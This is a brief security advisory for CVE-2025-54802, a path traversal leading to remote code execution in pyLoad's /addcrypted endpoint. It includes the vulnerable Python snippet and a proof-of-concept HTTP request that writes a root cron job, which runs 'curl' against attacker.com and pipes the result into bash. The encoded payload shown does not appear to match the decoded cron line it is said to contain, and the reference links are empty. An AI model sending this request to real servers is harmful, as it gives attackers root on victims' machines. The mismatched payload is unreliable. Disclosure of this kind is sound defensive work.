### Key Information #### Vulnerability Overview - **Vulnerability Type**: Path Traversal and Remote Code Execution (RCE) - **Affected Version**: 0.5.0b3.dev89 - **Fixed Version**: 0.5.0b3.dev90 - **CVE ID**: CVE-2025-54802 - **Severity**: Critical (CVSS v3: 9.8/10) #### Vulnerability Details - **Endpoint**: POST /addcrypted - **Affected File**: src/pyload/webui/app/blueprints/cnl_blueprint.py - **Vulnerable Code**: ```python dlc_path = os.path.join( dlc_path, package.replace("/", "").replace("\\", "").replace(":", "") + ".dlc" ) dlc = flask.request.form["crypted"].replace(" ", "+") with open(dlc_path, mode="wb") as fp: ``` #### PoC (Proof of Concept) - **HTTP Request**: ```http POST /addcrypted HTTP/1.1 Host: localhost:8000 Content-Type: application/x-www-form-urlencoded Content-Length: 167 package=../../../../etc/cron.d/pyload&crypted=EkioqICopKIAgK1Byb29kIi0tLXJvbW1pLFxuZG90IEZ9dGQ8LzF9dGQ8LzJ9YlMub3B5ZWluakA1HwgV ``` - **Decoded Payload**: ```bash * * * * * root curl -s http://attacker.com/r.sh | bash ``` #### Impact - **Unauthenticated attackers** can exploit the path traversal vulnerability to write arbitrary files, leading to remote code execution with root privileges. - **Potential Risk**: By injecting malicious cron jobs or system files, a simple file upload endpoint can become a vector for full system compromise. #### References - [7e6a44fe](#) - [pyload-fix](#) - [pyload-pull](#)